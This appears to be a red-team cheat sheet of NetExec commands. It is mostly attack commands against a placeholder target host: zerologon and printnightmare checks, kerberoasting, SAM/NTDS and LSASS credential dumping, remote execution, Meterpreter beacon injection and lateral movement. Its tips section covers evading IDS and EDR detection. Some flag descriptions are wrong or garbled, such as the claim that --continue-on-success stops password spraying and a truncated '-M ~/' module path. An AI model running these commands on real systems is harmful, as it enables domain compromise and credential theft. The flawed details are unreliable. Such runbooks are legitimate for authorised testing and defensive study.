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Created November 8, 2024 17:11
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NetExec Runbook
# NetExec Runbook
## No Authentication (Anonymous)
### NFS Enumeration
netexec nfs TARGET_HOST -u "" -p "" --shares
netexec nfs TARGET_HOST -u "" -p "" --enum-shares
### SMB Exploit Checks
netexec smb TARGET_HOST -u '' -p '' -M zerologon
netexec smb TARGET_HOST -u '' -p '' -M petitpotam
## Low Privilege (Standard User)
### SMB Enumeration & Exploit Checks
netexec smb TARGET_HOST -u USER -p PASS --shares
netexec smb TARGET_HOST -u USER -p PASS --sessions
netexec smb TARGET_HOST -u USER -p PASS --rid-brute
netexec smb TARGET_HOST -u USER -p PASS -M enum_av
netexec smb TARGET_HOST -u USER -p PASS -M printerbug
netexec smb TARGET_HOST -u USER -p PASS -M printnightmare
netexec smb TARGET_HOST -u USER -p PASS -M ioxidresolver
netexec smb TARGET_HOST -u USER -p PASS -M ms17-010
### LDAP Enumeration & Attacks
netexec ldap TARGET_HOST -u USER -p PASS --users
netexec ldap TARGET_HOST -u USER -p PASS --groups
netexec ldap TARGET_HOST -u USER -p PASS --asreproast /tmp/hashes.txt
netexec ldap TARGET_HOST -u USER -p PASS --kerberoasting /tmp/hashes.txt
netexec ldap TARGET_HOST -u USER -p PASS -M adcs
netexec ldap TARGET_HOST -u USER -p PASS -M laps
### WMI Exploits
netexec wmi TARGET_HOST -u USER -p PASS -M ioxidresolver
netexec wmi TARGET_HOST -u USER -p PASS -M zerologon
### MSSQL Privesc Checks
netexec mssql TARGET_HOST -u USER -p PASS -M mssql_priv
## High Privilege (Administrative)
### SMB Credential Dumping & Lateral Movement
netexec smb TARGET_HOST -u ADMIN -p PASS --sam
netexec smb TARGET_HOST -u ADMIN -p PASS --lsa
netexec smb TARGET_HOST -u ADMIN -p PASS --ntds
netexec smb TARGET_HOST -u ADMIN -p PASS -M hash_spider
netexec smb TARGET_HOST -u ADMIN -p PASS -M lsassy
### SMB Command & PowerShell Execution
netexec smb TARGET_HOST -u ADMIN -p PASS -x whoami
netexec smb TARGET_HOST -u ADMIN -p PASS -X Get-Process
### WinRM Credential Dumping & Execution
netexec winrm TARGET_HOST -u ADMIN -p PASS -X whoami
netexec winrm TARGET_HOST -u ADMIN -p PASS --sam
### WMI Enumeration
netexec wmi TARGET_HOST -u ADMIN -p PASS -M enum_dns
netexec wmi TARGET_HOST -u ADMIN -p PASS -M get_netconnections
### MSSQL Injection & Execution
netexec mssql TARGET_HOST -u ADMIN -p PASS -X whoami
netexec mssql TARGET_HOST -u ADMIN -p PASS -M met_inject
netexec mssql TARGET_HOST -u ADMIN -p PASS -M nanodump
# NetExec Tips & Best Practices
## Avoiding Detection
- Use the `--jitter` option to add randomized delays between requests to avoid triggering IPS/IDS
netexec --jitter 1-5 smb TARGET -u USER -p PASS
- Avoid using the same account for scanning large number of hosts. Distribute scans across multiple accounts.
## Targeted Enumeration
- Use `--filter-shares READ WRITE` to only enumerate shares with read and write access
- Grep and filter LDAP output to find specific users/groups of interest
netexec ldap TARGET -u USER -p PASS --users | grep -i admin
- Use `--continue-on-success` with password lists to stop spraying after a valid credential is found
## Automating with Scripts
- Use the `-M` flag to specify a custom module from a script
netexec smb TARGET -u ADMIN -p PASS -M ~/
- Chain multiple NetExec commands together in a bash script to automate common enumeration tasks
## OPSEC Considerations
- Use `{DNS}` to resolve hostnames through a different DNS server
netexec {DNS:xx.xx.xx.xx} smb TARGET -u USER -p PASS
- Be careful when using modules that create/modify files on the target (scuffy, drop-sc, etc.) as they may get flagged by AV/EDR
- Clean up any files uploaded or created during your testing
## Offline Credential Attacks
- Use `--asreproast` and `--kerberoasting` to dump hashes for offline cracking
- Dump SAM/NTDS databases with `--sam` and `--ntds` and crack offline with Hashcat
## Lateral Movement
- Use `hash_spider` module to scan the network and find systems where the compromised user has admin access
- Use `-M lsassy` and `-M nanodump` to remotely dump LSASS without executing code on the target
- Chain SMB `-M empire_exec` with MSSQL `-M met_inject` to laterally move and inject beacons
## Privilege Escalation
- Always check for low-hanging fruit like `gpp_password`, `gpp_autologin`, and unattended installs
- Abuse misconfigured service accounts and delegations with `--delegate` and `-M addcomputer`
- Use `-M masky` to dump domain user creds through ADCS if a CA is accessible
Hopefully these tips will help you get the most out of NetExec for your red team engagements and penetration tests! Let me know if you have any other NetExec tips to share.
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